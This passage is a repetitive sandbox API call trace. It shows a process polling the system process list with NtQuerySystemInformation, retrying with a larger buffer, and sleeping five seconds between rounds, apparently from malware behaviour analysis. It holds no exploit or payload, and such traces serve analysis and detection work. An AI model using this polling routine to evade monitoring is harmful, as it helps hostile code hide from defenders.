NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.581] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.582] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.582] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.582] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.584] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.585] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.604] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.605] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.605] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.605] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.606] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.607] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.608] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.612] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.612] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.612] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.612] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.613] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.615] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.615] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.627] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.627] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.628] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.628] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.628] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.631] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.631] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.643] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.643] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.644] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.644] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.644] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.646] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.647] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.659] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.660] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.660] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.660] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.661] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.663] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.663] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.674] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.674] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.675] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.675] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.675] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.677] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.678] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.690] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.690] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.691] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.691] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.691] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.694] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.695] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.716] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.716] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.717] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.717] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.719] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.719] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.721] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.721] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.721] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.721] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.722] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.723] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.724] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.736] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.736] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.737] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.737] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.737] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.740] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.740] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.783] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.784] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.784] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.785] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.785] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.787] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.788] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.799] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.799] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.800] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.800] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.800] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.802] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.802] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.814] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.815] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.815] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.815] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.816] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.818] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.818] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.830] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.830] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.831] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.832] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.832] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.836] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.836] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.846] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.846] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.847] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.847] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.847] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.850] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.850] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.884] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.884] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.884] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.885] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.885] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.887] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.888] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.892] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.892] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.893] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.893] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.893] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.895] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.896] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.908] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.908] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.909] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.909] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.909] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.911] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.912] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.925] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.925] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.926] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.926] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.927] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.928] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.929] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.939] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.939] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.940] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.940] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.940] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.942] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.942] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.956] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.957] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, 